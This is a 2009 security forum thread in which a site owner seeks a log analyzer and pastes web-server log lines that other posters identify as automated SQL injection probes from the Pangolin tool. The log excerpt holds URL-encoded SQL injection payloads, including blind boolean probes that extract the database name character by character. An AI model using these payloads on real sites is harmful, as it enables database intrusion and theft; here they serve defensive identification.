-
May 11th, 2009, 12:10 PM
#1
Junior Member
Log analyzer
Hello,
I am looking for log analyzer that i can use to narrow down errors, sql injection and XSS(any from of attacks).
Thx in advance
-
May 11th, 2009, 02:40 PM
#2
demonize....you will probably get way more responses if you give us more info....like where these logs are??
Operating system, router, etc
I know that somepeople have all logs copied to a specific machine to then analyze??
How big are these logs???
MLF
Last edited by morganlefay; May 11th, 2009 at 03:45 PM.
How people treat you is their karma- how you react is yours-Wayne Dyer
-
May 11th, 2009, 04:35 PM
#3
Junior Member
the log file size is 22.9 mb
Part of the log:
Code:
+and+1=convert(nvarchar,CHAR(+127+))%2B(select+@@servername)
+having+1=1--
id0=0%20/*!39999%20and%201=2*/--%20and%201=1 HTTP/1.1" 200 12371 "-" "pangolin/0.1"
id0=0%20and%20(select%20length(database())%20%20)%3C=32%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20length(database())%20%20)%3E16%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20length(database())%20%20)%3E24%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20length(database())%20%20)%3E28%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20length(database())%20%20)%3E30%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20length(database())%20%20)%3E31%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3C=256%20and%201=1 HTTP/1.1"
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E128%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E192%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E224%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E240%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E248%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E252%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E254%20and%201=1 HTTP/1.1" 200
id0=0%20and%20(select%20ascii(substr(database(),1,1))%20%20)%3E255%20and%201=1 HTTP/1.1" 200
-
May 11th, 2009, 06:10 PM
#4
The tool you use will depend on the APPLICATION that is logging the events....
there are ISA, SQL, Exchange, Event, Syslog, IIS, log analyzers
using Google and being a little more specific will really help in your search.
Looks like a bot
http://www.google.com/search?q=pango...e=utf8&oe=utf8
MLF
Last edited by morganlefay; May 11th, 2009 at 06:14 PM.
How people treat you is their karma- how you react is yours-Wayne Dyer
-
May 11th, 2009, 07:22 PM
#5
yup. looks like pangolin. sql injection bot. skiddie stuff
In God We Trust....Everything else we backup.
-
May 12th, 2009, 12:08 AM
#6
Originally Posted by Cheap Scotch Ron
sql injection bot. skiddie stuff
It ain't a sql bot, it's a browser based bot
http://www.botsvsbrowsers.com/details/144772/index.html
Test drive it here:
http://www.botsvsbrowsers.com/Simula...ngolin%2F0%2E1
Check your directory's and make sure everything is how it is supposed to be, also re-check your chmod permission settings.
-
May 12th, 2009, 02:54 AM
#7
It ain't a sql bot, it's a browser based bot
WTF?
pangolin is a pen program u initiate from a GUI that runs a bunch of automated dynamic sql that attempt a sql injection hack on a variety of websites. You tell it which DBMS and point it to a bunch of websites and it attempts to compromise the dbms.
Early versions (as referenced above) also contained a backdoor that sent the logs home to China.
http://www.nosec.org/en/pangolin.html
if walks and smells like a duck, it's a duck.
Call it what you like.
Scotty, beam me up...
In God We Trust....Everything else we backup.
-
May 12th, 2009, 04:20 AM
#8
Correct..
Thanks for the correction CSR
The "tool" that i was thinking off is something completly different. ( )
also thanks for the little tidbit of info.
Originally Posted by Cheap Scotch Ron
if walks and smells like a duck, it's a duck.
Call it what you like.
Scotty, beam me up...
Similar Threads
-
By TidaLphasE23 in forum Firewall & Honeypot Discussions
Replies: 0
Last Post: July 12th, 2004, 04:54 PM
-
By thehorse13 in forum Microsoft Security Discussions
Replies: 0
Last Post: June 9th, 2003, 02:42 PM
-
By Tim_axe in forum Firewall & Honeypot Discussions
Replies: 1
Last Post: April 9th, 2002, 05:05 AM
-
By Don_Wolf in forum Security Archives
Replies: 0
Last Post: December 30th, 2001, 07:04 PM
-
By Don_Wolf in forum Roll Call
Replies: 0
Last Post: December 30th, 2001, 05:07 PM
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|